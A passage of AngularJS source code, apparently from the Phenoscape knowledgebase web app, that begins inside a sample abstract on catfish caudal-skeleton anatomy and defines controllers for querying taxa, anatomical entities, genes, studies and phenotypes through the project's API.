In the Loricariidae and Plotosidae the second ural centrum is fused with PU[subscript]1+U[subscript]l, in early development. A separate, well-developed second ural autocentrum occurs in some members of four specialized and unrelated families. This is interpreted as independent redevelopment of a presumedly primitive pre-ostariophysan condition. The advanced conditions of each of these four features of the caudal skeleton tend to occur together in forms which are also regarded as advanced in most other parts of their anatomy. The primitive character states of these features tend to be retained together in a number of families, i.e. Diplomystidae, Ictaluridae, Bagridae, Cranoglanididae, Schilbeidae, Pangasiidae, and Cetopsidae. Advanced features in the caudal skeleton indicate a relationship between the Clariidae and Heteropneustidae, the Doradidae and Auchenipteridae, the Loricariidae, Astroblepidae, and Callichthyidae, and the Plotosidae and Chacidae. The siluriform caudal skeleton shares many features with that of the cypriniforms but it is consistently more advanced. The ostariophysan caudal skeleton is similar to that of the clupeoids, but it resembles the caudal skeleton of the Gonorynchiformes more closely than that of any other group.", annotatedText: "", longestOnly: false } $scope.tabs = { input: {active: true}, output: {active: false} } $scope.runQuery = function (inputText) { $scope.data.annotatedText = ""; $scope.tabs.output.active = true; $scope.annotationPromise = $http.get('http://kb.phenoscape.org/scigraph/annotations', {params: {content: $scope.data.inputText, longestOnly: $scope.data.longestOnly}}).then(function (response) { var text = response.data; $scope.data.annotatedText = text; } ); }; }) .controller('EntityController', function ($scope, $routeParams, $location, $window, Term, TaxaWithPhenotype, EntityPresence, EntityAbsence, EntityPhenotypeGenes, EntityExpressionGenes, OntologyTermSearch, Vocab, OMN, TaxonPhenotypesQuery, Label, APIroot) { $scope.termID = $routeParams.term; $scope.term = Term.query({'iri': $scope.termID}); $scope.tabs = { properties: {active: true}, taxa: {active: false}, genes: {active: false}, } $scope.taxaTabs = { phenotypes: {active: true}, presence: {active: false}, absence: {active: false} } $scope.genesTabs = { phenotypes: {active: true}, expression: {active: false} } $scope.activateTab = function (tabname) { if (_.has($scope.tabs, tabname)) { $scope.tabs[tabname].active = true; $location.search('tab', tabname); } } $scope.activateTaxaTab = function (tabname) { if (_.has($scope.taxaTabs, tabname)) { $scope.taxaTabs[tabname].active = true; $location.search('taxatab', tabname); } } $scope.activateGenesTab = function (tabname) { if (_.has($scope.genesTabs, tabname)) { $scope.genesTabs[tabname].active = true; $location.search('genestab', tabname); } } // $scope.$on('$routeUpdate', function() { // $scope.activateTab($location.search().tab); // $scope.activateTaxaTab($location.search().taxatab); // $scope.activateGenesTab($location.search().genestab); // }); if ($routeParams.tab && _.has($scope.tabs, $routeParams.tab)) { $scope.tabs[$routeParams.tab].active = true; } if ($routeParams.taxatab && _.has($scope.taxaTabs, $routeParams.taxatab)) { $scope.taxaTabs[$routeParams.taxatab].active = true; } if ($routeParams.genestab && _.has($scope.genesTabs, $routeParams.genestab)) { $scope.genesTabs[$routeParams.genestab].active = true; } $scope.autocompleteTaxa = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.VTO 
}).$promise.then(function (response) { return response.results; }); }; $scope.autocompleteQuality = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.PATO }).$promise.then(function (response) { return response.results; }); }; $scope.filters = { phenotypesTaxonFilter: null, phenotypesQualityFilter: null, phenotypesTaxaIncludeParts: false, phenotypesTaxaIncludeHomologs: false }; if ($routeParams['filters.phenotypesTaxonFilter']) { Label.query({'iri': $routeParams['filters.phenotypesTaxonFilter']}).$promise.then(function (response) { $scope.filters.phenotypesTaxonFilter = response; }); } if ($routeParams['filters.phenotypesQualityFilter']) { Label.query({'iri': $routeParams['filters.phenotypesQualityFilter']}).$promise.then(function (response) { $scope.filters.phenotypesQualityFilter = response; }); } if ($routeParams['filters.phenotypesTaxaIncludeParts']) { $scope.filters.phenotypesTaxaIncludeParts = "true" === $routeParams['filters.phenotypesTaxaIncludeParts']; } if ($routeParams['filters.phenotypesTaxaIncludeHomologs']) { $scope.filters.phenotypesTaxaIncludeHomologs = "true" === $routeParams['filters.phenotypesTaxaIncludeHomologs']; } $scope.taxaWithPhenotypesPage = 1; $scope.taxaWithPhenotypesMaxSize = 3; $scope.taxaWithPhenotypesLimit = 20; $scope.taxaWithPhenotypesPageChanged = function (newPage) { $scope.taxaWithPhenotypesPage = newPage; var params = { entity: OMN.angled($scope.termID), parts: $scope.filters.phenotypesTaxaIncludeParts, homologs: $scope.filters.phenotypesTaxaIncludeHomologs, limit: $scope.taxaWithPhenotypesLimit, offset: ($scope.taxaWithPhenotypesPage - 1) * $scope.taxaWithPhenotypesLimit }; if ($scope.filters.phenotypesTaxonFilter) { params.in_taxon = $scope.filters.phenotypesTaxonFilter['@id']; } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.taxaWithPhenotypes = TaxaWithPhenotype.query(params); }; $scope.resetTaxaWithPhenotypes = function() { var params = { entity: OMN.angled($scope.termID), parts: $scope.filters.phenotypesTaxaIncludeParts, homologs: $scope.filters.phenotypesTaxaIncludeHomologs, total: true}; if ($scope.filters.phenotypesTaxonFilter) { params.in_taxon = $scope.filters.phenotypesTaxonFilter['@id']; } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.taxaWithPhenotypesTotal = TaxaWithPhenotype.query(params); $scope.taxaWithPhenotypesPageChanged(1); }; $scope.$watchGroup(['filters.phenotypesTaxonFilter', 'filters.phenotypesQualityFilter', 'filters.phenotypesTaxaIncludeParts', 'filters.phenotypesTaxaIncludeHomologs'], function (newValues, oldValues) { updateTaxaWithPhenotypeDownload(); $scope.resetTaxaWithPhenotypes(); }); $scope.$watch('filters.phenotypesTaxonFilter', function (value) { if ($scope.filters.phenotypesTaxonFilter) { $location.search('filters.phenotypesTaxonFilter', $scope.filters.phenotypesTaxonFilter['@id']); } else { $location.search('filters.phenotypesTaxonFilter', null); } }); $scope.$watch('filters.phenotypesQualityFilter', function (value) { if ($scope.filters.phenotypesQualityFilter) { $location.search('filters.phenotypesQualityFilter', $scope.filters.phenotypesQualityFilter['@id']); } else { $location.search('filters.phenotypesQualityFilter', null); } }); $scope.$watch('filters.phenotypesTaxaIncludeParts', function (value) { if ($scope.filters.phenotypesTaxaIncludeParts) { $location.search('filters.phenotypesTaxaIncludeParts', 
$scope.filters.phenotypesTaxaIncludeParts ? "true" : "false"); } else { $location.search('filters.phenotypesTaxaIncludeParts', null); } }); $scope.$watch('filters.phenotypesTaxaIncludeHomologs', function (value) { if ($scope.filters.phenotypesTaxaIncludeHomologs) { $location.search('filters.phenotypesTaxaIncludeHomologs', $scope.filters.phenotypesTaxaIncludeHomologs ? "true" : "false"); } else { $location.search('filters.phenotypesTaxaIncludeHomologs', null); } }); function updateTaxaWithPhenotypeDownload() { var url = APIroot + "/taxon/with_phenotype?"; var urlParams = ["limit=0"]; urlParams.push("entity=" + $window.encodeURIComponent(OMN.angled($scope.termID))); if ($scope.filters.phenotypesQualityFilter) { urlParams.push("quality=" + $window.encodeURIComponent(OMN.angled($scope.filters.phenotypesQualityFilter['@id']))); } if ($scope.filters.phenotypesTaxonFilter) { urlParams.push("in_taxon=" + $window.encodeURIComponent($scope.filters.phenotypesTaxonFilter['@id'])); } if ($scope.filters.phenotypesTaxaIncludeParts) { urlParams.push("parts=" + $scope.filters.phenotypesTaxaIncludeParts) } if ($scope.filters.phenotypesTaxaIncludeHomologs) { urlParams.push("homologs=" + $scope.filters.phenotypesTaxaIncludeHomologs) } $scope.linkToTaxaWithPhenotypeDownload = url + urlParams.join("&"); } $scope.filters.presenceTaxonFilter = null; $scope.taxaWithPresencePage = 1; $scope.taxaWithPresenceMaxSize = 3; $scope.taxaWithPresenceLimit = 20; $scope.taxaWithPresencePageChanged = function (newPage) { $scope.taxaWithPresencePage = newPage; var params = {entity: $scope.termID, limit: $scope.taxaWithPresenceLimit, offset: ($scope.taxaWithPresencePage - 1) * $scope.taxaWithPresenceLimit}; if ($scope.filters.presenceTaxonFilter) { params.in_taxon = $scope.filters.presenceTaxonFilter['@id']; } $scope.taxaWithPresence = EntityPresence.query(params); }; $scope.resetTaxaWithPresence = function() { var params = {entity: $scope.termID, total: true}; if ($scope.filters.presenceTaxonFilter) { params.in_taxon = $scope.filters.presenceTaxonFilter['@id']; } $scope.taxaWithPresenceTotal = EntityPresence.query(params); $scope.taxaWithPresencePageChanged(1); }; $scope.$watch('filters.presenceTaxonFilter', function (value) { $scope.resetTaxaWithPresence(); }); $scope.taxaWithAbsencePage = 1; $scope.taxaWithAbsenceMaxSize = 3; $scope.taxaWithAbsenceLimit = 20; $scope.taxaWithAbsencePageChanged = function (newPage) { $scope.taxaWithAbsencePage = newPage; var params = {entity: $scope.termID, limit: $scope.taxaWithAbsenceLimit, offset: ($scope.taxaWithPresencePage - 1) * $scope.taxaWithAbsenceLimit}; if ($scope.filters.absenceTaxonFilter) { params.in_taxon = $scope.filters.absenceTaxonFilter['@id']; } $scope.taxaWithAbsence = EntityAbsence.query(params); }; $scope.resetTaxaWithAbsence = function() { var params = {entity: $scope.termID, total: true}; if ($scope.filters.absenceTaxonFilter) { params.in_taxon = $scope.filters.absenceTaxonFilter['@id']; } $scope.taxaWithAbsenceTotal = EntityAbsence.query(params); $scope.taxaWithAbsencePageChanged(1); }; $scope.$watch('filters.absenceTaxonFilter', function (value) { $scope.resetTaxaWithAbsence(); }); $scope.phenotypeGenesPage = 1; $scope.phenotypeGenesMaxSize = 3; $scope.phenotypeGenesLimit = 20; $scope.phenotypeGenesSettings = {}; $scope.phenotypeGenesSettings.includeParts = false; $scope.phenotypeGenesSettings.includeHomologs = false; $scope.phenotypeGenesPageChanged = function (newPage) { $scope.phenotypeGenesPage = newPage; $scope.phenotypeGenes = EntityPhenotypeGenes.query( { 
iri: $scope.termID, limit: $scope.phenotypeGenesLimit, offset: ($scope.phenotypeGenesPage - 1) * $scope.phenotypeGenesLimit, parts: $scope.phenotypeGenesSettings.includeParts, homologs: $scope.phenotypeGenesSettings.includeHomologs }); }; $scope.resetPhenotypeGenes = function() { $scope.phenotypeGenesTotal = EntityPhenotypeGenes.query( { iri: $scope.termID, total: true, parts: $scope.phenotypeGenesSettings.includeParts, homologs: $scope.phenotypeGenesSettings.includeHomologs }); $scope.phenotypeGenesPageChanged(1); }; $scope.expressionGenesPage = 1; $scope.expressionGenesMaxSize = 3; $scope.expressionGenesLimit = 20; $scope.expressionGenesPageChanged = function (newPage) { $scope.expressionGenesPage = newPage; $scope.expressionGenes = EntityExpressionGenes.query({iri: $scope.termID, limit: $scope.expressionGenesLimit, offset: ($scope.expressionGenesPage - 1) * $scope.expressionGenesLimit}); }; $scope.resetExpressionGenes = function() { $scope.expressionGenesTotal = EntityExpressionGenes.query({iri: $scope.termID, total: true}); $scope.expressionGenesPageChanged(1); }; $scope.resetTaxaWithPresence(); $scope.resetTaxaWithAbsence(); $scope.resetPhenotypeGenes(); $scope.resetExpressionGenes(); }) .controller('TaxonController', function ($scope, $routeParams, $location, $log, $window, Taxon, TaxonPhenotypesQuery, VariationProfileQuery, EntityPresenceEvidence, EntityAbsenceEvidence, OntologyTermSearch, OMN, Vocab, Label, APIroot) { $scope.taxonID = $routeParams.taxon; $scope.taxon = Taxon.query({'iri': $scope.taxonID}); $scope.filters = { phenotypesEntityFilter: null, phenotypesQualityFilter: null, quality_type: null, phenotypesEntityIncludeParts: false, phenotypesEntityIncludeHomologs: false }; if ($routeParams['phenotypes.entity']) { Label.query({'iri': $routeParams['phenotypes.entity']}).$promise.then(function (response) { $scope.filters.phenotypesEntityFilter = response; }); } if ($routeParams['phenotypes.quality_type']) { $scope.filters.quality_type = $routeParams['phenotypes.quality_type'] } else { $scope.filters.quality_type = "quality-phenotype"; } if ($routeParams['phenotypes.quality']) { Label.query({'iri': $routeParams['phenotypes.quality']}).$promise.then(function (response) { $scope.filters.phenotypesQualityFilter = response; }); } if ($routeParams['phenotypes.entity_parts']) { $scope.filters.phenotypesEntityIncludeParts = "true" === $routeParams['phenotypes.entity_parts']; } if ($routeParams['phenotypes.entity_homologs']) { $scope.filters.phenotypesEntityIncludeHomologs = "true" === $routeParams['phenotypes.entity_homologs']; } $scope.autocompleteEntity = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.Uberon }).$promise.then(function (response) { return response.results; }); }; $scope.autocompleteQuality = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.PATO }).$promise.then(function (response) { return response.results; }); }; $scope.phenotypeProfilePage = 1; $scope.phenotypeProfileLimit = 20; $scope.phenotypeProfileMaxSize = 3; $scope.phenotypeProfilePageChanged = function (newPage) { $scope.phenotypeProfilePage = newPage; var params = { taxon: $scope.taxonID, parts: $scope.filters.phenotypesEntityIncludeParts, homologs: $scope.filters.phenotypesEntityIncludeHomologs, limit: $scope.phenotypeProfileLimit, offset: ($scope.phenotypeProfilePage - 1) * $scope.phenotypeProfileLimit }; if ($scope.filters.quality_type == 'quality-phenotype') { if ($scope.filters.phenotypesEntityFilter) { 
params.entity = OMN.angled($scope.filters.phenotypesEntityFilter['@id']); } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.phenotypeProfile = TaxonPhenotypesQuery.query(params); } else { var service = null; if ($scope.filters.quality_type == 'entailing-presence') { service = EntityPresenceEvidence; } else { service = EntityAbsenceEvidence; } if ($scope.filters.phenotypesEntityFilter) { params.entity = $scope.filters.phenotypesEntityFilter['@id']; $scope.phenotypeProfile = service.query(params); } else { $scope.phenotypeProfile = null; } } }; $scope.resetPhenotypeProfile = function () { var params = { taxon: $scope.taxonID, parts: $scope.filters.phenotypesEntityIncludeParts, homologs: $scope.filters.phenotypesEntityIncludeHomologs, total: true}; if ($scope.filters.quality_type == 'quality-phenotype') { if ($scope.filters.phenotypesEntityFilter) { params.entity = OMN.angled($scope.filters.phenotypesEntityFilter['@id']); } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.phenotypeProfileTotal = TaxonPhenotypesQuery.query(params); var url = APIroot + "/taxon/phenotypes?"; var urlParams = ["limit=0"]; urlParams.push("parts=" + params.parts); if (params.entity) { urlParams.push("entity=" + $window.encodeURIComponent(params.entity)); } if (params.quality) { urlParams.push("quality=" + $window.encodeURIComponent(params.quality)); } urlParams.push("taxon=" + $window.encodeURIComponent(params.taxon)); $scope.linkToTaxonPhenotypeProfileDownload = url + urlParams.join("&"); } else { var service = null; var url = null; if ($scope.filters.quality_type == 'entailing-presence') { service = EntityPresenceEvidence; url = APIroot + "/entity/presence/evidence?"; } else { service = EntityAbsenceEvidence; url = APIroot + "/entity/absence/evidence?"; } if ($scope.filters.phenotypesEntityFilter) { params.entity = $scope.filters.phenotypesEntityFilter['@id']; $scope.phenotypeProfileTotal = service.query(params); var urlParams = ["limit=0"]; urlParams.push("taxon=" + $window.encodeURIComponent(params.taxon)); urlParams.push("entity=" + $window.encodeURIComponent(params.entity)); $scope.linkToTaxonPhenotypeProfileDownload = url + urlParams.join("&"); } else { $scope.phenotypeProfileTotal = null; $scope.linkToTaxonPhenotypeProfileDownload = null; } } $scope.phenotypeProfilePageChanged(1); } $scope.resetPhenotypeProfile(); $scope.$watchGroup(['filters.phenotypesEntityFilter', 'filters.phenotypesQualityFilter', 'filters.quality_type', 'filters.phenotypesEntityIncludeParts', 'filters.phenotypesEntityIncludeHomologs'], function (value) { $scope.resetPhenotypeProfile(); }); $scope.$watch('filters.phenotypesEntityFilter', function (value) { if ($scope.filters.phenotypesEntityFilter) { $location.search('phenotypes.entity', $scope.filters.phenotypesEntityFilter['@id']); } else { $location.search('phenotypes.entity', null); } }); $scope.$watch('filters.phenotypesQualityFilter', function (value) { if ($scope.filters.phenotypesQualityFilter) { $location.search('phenotypes.quality', $scope.filters.phenotypesQualityFilter['@id']); } else { $location.search('phenotypes.quality', null); } }); $scope.$watch('filters.quality_type', function (value) { $location.search('phenotypes.quality_type', $scope.filters.quality_type); }); $scope.$watch('filters.phenotypesEntityIncludeParts', function (value) { $location.search('phenotypes.entity_parts', 
$scope.filters.phenotypesEntityIncludeParts ? "true" : "false"); }); $scope.$watch('filters.phenotypesEntityIncludeHomologs', function (value) { $location.search('phenotypes.entity_homologs', $scope.filters.phenotypesEntityIncludeHomologs ? "true" : "false"); }); $scope.variationProfilePage = 1; $scope.variationProfileLimit = 20; $scope.variationProfileMaxSize = 3; $scope.variationProfileTotal = VariationProfileQuery.query({taxon: $scope.taxonID, total: true}); $scope.variationProfilePageChanged = function (newPage) { $scope.variationProfilePage = newPage; $scope.variationProfile = VariationProfileQuery.query({taxon: $scope.taxonID, limit: $scope.variationProfileLimit, offset: ($scope.variationProfilePage - 1) * $scope.variationProfileLimit}); }; $scope.variationProfilePageChanged(1); $scope.tabs = { properties: {active: true}, phenotypes: {active: false}, variation: {active: false}, similarity: {active: false} } $scope.activateTab = function (tabname) { if (_.has($scope.tabs, tabname)) { $scope.tabs[tabname].active = true; $location.search('tab', tabname); } } $scope.$on('$routeUpdate', function() { $scope.activateTab($location.search().tab); }); if ($routeParams.tab && _.has($scope.tabs, $routeParams.tab)) { $scope.tabs[$routeParams.tab].active = true; } }) .controller('StudyController', function ($scope, $routeParams, $location, $log, $window, Study, StudyTaxa, StudyPhenotypes, Vocab, Label) { $scope.studyID = $routeParams.study; $scope.study = Study.query({'iri': $scope.studyID}); $scope.phenotypesPage = 1; $scope.phenotypesLimit = 20; $scope.phenotypesMaxSize = 3; $scope.phenotypesPageChanged = function (newPage) { $scope.phenotypesPage = newPage; var params = { iri: $scope.studyID, limit: $scope.phenotypesLimit, offset: ($scope.phenotypesPage - 1) * $scope.phenotypesLimit }; $scope.phenotypes = StudyPhenotypes.query(params); }; $scope.resetPhenotypes = function () { var params = {iri: $scope.studyID, total: true}; $scope.phenotypesTotal = StudyPhenotypes.query(params); $scope.phenotypesPageChanged(1); } $scope.resetPhenotypes(); $scope.taxaPage = 1; $scope.taxaLimit = 20; $scope.taxaMaxSize = 3; $scope.taxaPageChanged = function (newPage) { $scope.taxaPage = newPage; var params = { iri: $scope.studyID, limit: $scope.taxaLimit, offset: ($scope.taxaPage - 1) * $scope.taxaLimit }; $scope.taxa = StudyTaxa.query(params); }; $scope.resetTaxa = function () { var params = {iri: $scope.studyID, total: true}; $scope.taxaTotal = StudyTaxa.query(params); $scope.taxaPageChanged(1); } $scope.resetTaxa(); }) .controller('GeneController', function ($scope, $routeParams, $location, Gene, GenePhenotypes, GeneExpression) { $scope.geneID = $routeParams.gene; $scope.gene = Gene.query({iri: $scope.geneID}); $scope.queryPhenotypes = function () { $scope.phenotypes = GenePhenotypes.query({iri: $scope.geneID}); } $scope.queryExpression = function () { $scope.expression = GeneExpression.query({iri: $scope.geneID}); } $scope.queryPhenotypes(); $scope.queryExpression(); $scope.tabs = { phenotypes: {active: true}, expression: {active: false}, similarity: {active: false} } $scope.activateTab = function (tabname) { if (_.has($scope.tabs, tabname)) { $scope.tabs[tabname].active = true; $location.search('tab', tabname); } } $scope.$on('$routeUpdate', function() { $scope.activateTab($location.search().tab); }); if ($routeParams.tab && _.has($scope.tabs, $routeParams.tab)) { $scope.tabs[$routeParams.tab].active = true; } }) .controller('CharacterStateController', function ($scope, $routeParams, Label) { $scope.stateID 
= $routeParams.state; $scope.termLabel = Label.query({'iri': $scope.stateID}); }) .controller('ContentsController', function ($scope) { }) .controller('PresenceAbsenceController', function ($scope, EntityPresence) { $scope.presenceStates = []; $scope.queryPresence = function () { if ($scope.taxon && $scope.entity) { $scope.presenceStates = EntityPresence.query({'taxon': $scope.taxon, 'entity': $scope.entity}); } else { $scope.presenceStates = []; } }; }) .controller('QueryCharacterStatesController', function ($scope, CharacterStateQuery, Vocab, OMN) { $scope.queryPanelOptions = { includeTaxonGroup: true, includeEntity: true }; $scope.queryParams = { taxa: [], entities: [], expressionEntities: [], matchAllEntities: false, }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryCharacterStates(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return OMN.angled(item['@id']); }); if (taxa.length > 0) { if (queryParams.matchAllTaxa) { result.taxon = OMN.intersection(taxa); } else { result.taxon = OMN.union(taxa); } } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } return result; } $scope.queryCharacterStates = function () { $scope.statesResults = CharacterStateQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = CharacterStateQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryCharacterStates(); $scope.queryTotal(); } $scope.queryCharacterStates(); $scope.queryTotal(); }) .controller('QueryVariationProfileController', function ($scope, $routeParams, VariationProfileQuery, Vocab, OMN, Label) { $scope.queryPanelOptions = { includeTaxonGroup: true, includeEntity: false }; // $scope.queryParams = { // taxa: [], // entities: [], // expressionEntities: [], // matchAllEntities: false, // }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryVariationProfile(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return item['@id']; }); if (taxa.length > 0) { result.taxon = angular.toJson(taxa); } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } return result; } $scope.queryVariationProfile = function () { $scope.profileResults = VariationProfileQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = VariationProfileQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryVariationProfile(); $scope.queryTotal(); } var urlQueryParams = { taxa: [], entities: [], matchAllEntities: false, }; var taxa = []; if ($routeParams.taxa) { var taxa = angular.fromJson($routeParams.taxa); } 
urlQueryParams.taxa = taxa.map(function (item) { return {'@id': item}; }); $scope.queryParams = urlQueryParams; $scope.queryVariationProfile(); $scope.queryTotal(); // if (angular.isDefined(taxa)) { // urlQueryParams.taxa = taxa.map(function (item) { // return Label.query({iri: item}); // }); // } // $q.all(urlQueryParams.taxa.map(function (item) { // return item.$promise; // })).then(function (data) { // $scope.queryParams = urlQueryParams; // $scope.queryVariationProfile(); // $scope.queryTotal(); // }); }) .controller('QueryTaxaController', function ($scope, TaxonQuery, Vocab, OMN) { $scope.queryPanelOptions = { includeTaxonGroup: true, includeEntity: true, includeExpressionEntity: false }; $scope.queryParams = { taxa: [], entities: [], expressionEntities: [], matchAllEntities: false, }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryTaxa(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return OMN.angled(item['@id']); }); if (taxa.length > 0) { if (queryParams.matchAllTaxa) { result.taxon = OMN.intersection(taxa); } else { result.taxon = OMN.union(taxa); } } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } return result; } $scope.queryTaxa = function () { $scope.taxaResults = TaxonQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = TaxonQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryTaxa(); $scope.queryTotal(); } $scope.queryTaxa(); $scope.queryTotal(); }) .controller('QueryGenesController', function ($scope, GeneQuery, Vocab, OMN) { $scope.queryPanelOptions = { includeTaxonGroup: false, includeEntity: true, includeExpressionEntity: false //not yet working on service side }; $scope.queryParams = { taxa: [], entities: [], expressionEntities: [], matchAllEntities: false, }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryGenes(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return OMN.angled(item['@id']); }); if (taxa.length > 0) { if (queryParams.matchAllTaxa) { result.taxon = OMN.intersection(taxa); } else { result.taxon = OMN.union(taxa); } } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } var expressionEntities = queryParams.expressionEntities.map(function (item) { return OMN.angled(item['@id']); }); if (expressionEntities.length > 0) { if (queryParams.matchAllExpressionEntities) { result.expression_entity = OMN.intersection(expressionEntities); } else { result.expression_entity = OMN.union(expressionEntities); } } return result; } $scope.queryGenes = function () { $scope.genesResults = GeneQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal 
= GeneQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryGenes(); $scope.queryTotal(); } $scope.queryGenes(); $scope.queryTotal(); }) .controller('OntoTraceController', function ($scope, OntologyTermSearch, $http, Vocab, $filter, APIroot) { $scope.ontotraceURL = null; $scope.inputType = 'simple'; $scope.ontotraceSettings = { includeParts: false, includeAllCharacters: false }; $scope.queryEntityExpression = null; $scope.queryTaxonExpression = null; $scope.$watch('queryEntityLabelExpression', function (value) { if (value) { $http.get(APIroot + '/term/resolve_label_expression', {params: {expression: value}}).then( function (response) { $scope.entityExpressionErrorMessage = null; $scope.queryEntityExpression = response.data; }, function (error) { $scope.entityExpressionErrorMessage = error.data; $scope.queryEntityExpression = null; } ); } else { $scope.queryEntityExpression = null; } }); $scope.$watch('queryTaxonLabelExpression', function (value) { if (value) { $http.get(APIroot + '/term/resolve_label_expression', {params: {expression: value}}).then( function (response) { $scope.taxonExpressionErrorMessage = null; $scope.queryTaxonExpression = response.data; }, function (error) { $scope.taxonExpressionErrorMessage = error.data; $scope.queryTaxonExpression = null; } ); } else { $scope.queryTaxonExpression = null; } }); $scope.searchTaxa = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.VTO }).$promise.then(function (response) { return response.results; }); }; $scope.searchEntities = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.Uberon }).$promise.then(function (response) { return response.results; }); }; function prepareTerm(term) { return $filter('encodeURI')($filter('angled')(term['@id'])); } $scope.$watchGroup(['queryEntity', 'queryTaxon', 'queryEntityExpression', 'queryTaxonExpression', 'inputType', 'ontotraceSettings.includeAllCharacters', 'ontotraceSettings.includeParts'], function (value) { if ($scope.inputType == 'simple' && $scope.queryEntity && $scope.queryTaxon) { $scope.ontotraceURL = APIroot + "/ontotrace?entity=" + prepareTerm($scope.queryEntity) + "&taxon=" + prepareTerm($scope.queryTaxon) + "&variable_only=" + !$scope.ontotraceSettings.includeAllCharacters + "&parts=" + $scope.ontotraceSettings.includeParts; } else if ($scope.inputType == 'expression' && $scope.queryEntityExpression && $scope.queryTaxonExpression) { $scope.ontotraceURL = APIroot + "/ontotrace?entity=" + $filter('encodeURI')($scope.queryEntityExpression) + "&taxon=" + $filter('encodeURI')($scope.queryTaxonExpression) + "&variable_only=" + !$scope.ontotraceSettings.includeAllCharacters + "&parts=false"; } else { $scope.ontotraceURL = null; } }); }) .controller('SimilarityController', function ($scope, $routeParams, $q, $location, Gene, GeneSearch) { $scope.searchGenes = function (text) { return GeneSearch.query({ limit: 20, text: text }).$promise.then(function (response) { return response.results; }); }; $scope.$watch('geneToQuery', function (value) { if (_.has(value, '@id')) { $location.search('gene', value['@id']); } }); if ($routeParams.gene) { Gene.query({iri: $routeParams.gene}).$promise.then(function (value) { $scope.geneToQuery = value; }); } }) .controller('QueryPanelController', function ($scope, $location, Autocomplete, OMN, Vocab, Label, $q) { $scope.queryPages = [ {label: "Taxa", href: "/query_taxa", key: "taxa"}, 
{label: "Character states", href: "/query_characters", key: "character_states"}, {label: "Genes", href: "/query_genes", key: "genes"}, {label: "Variation profile", href: "/query_variation_profile", key: "variation_profile"} ]; $scope.queryTaxonValues = []; $scope.queryEntityValues = []; $scope.queryExpressionEntityValues = []; $scope.selectedPage = _.findWhere($scope.queryPages, {key: $scope.configuration}); function maybeGetLabel(term) { if (!term.label && !term.$promise) { return Label.query({iri: term['@id']}).$promise; } else { return $q.when(term); } } function mapParameters() { _.defaults($scope.parameters, {taxa: [], entities: [], expressionEntities: []}); $q.all($scope.parameters.taxa.map(function (item) { return maybeGetLabel(item); })).then(function (items) { $scope.queryTaxonValues.splice(0, $scope.queryTaxonValues.length); items.forEach(function (item) { $scope.queryTaxonValues.push({term: item}); }); }); $q.all($scope.parameters.entities.map(function (item) { return maybeGetLabel(item); })).then(function (items) { $scope.queryEntityValues.splice(0, $scope.queryTaxonValues.length); items.forEach(function (item) { $scope.queryEntityValues.push({term: item}); }); }); $q.all($scope.parameters.expressionEntities.map(function (item) { return maybeGetLabel(item); })).then(function (items) { $scope.queryExpressionEntityValues.splice(0, $scope.queryTaxonValues.length); items.forEach(function (item) { $scope.queryExpressionEntityValues.push({term: item}); }); }); } function 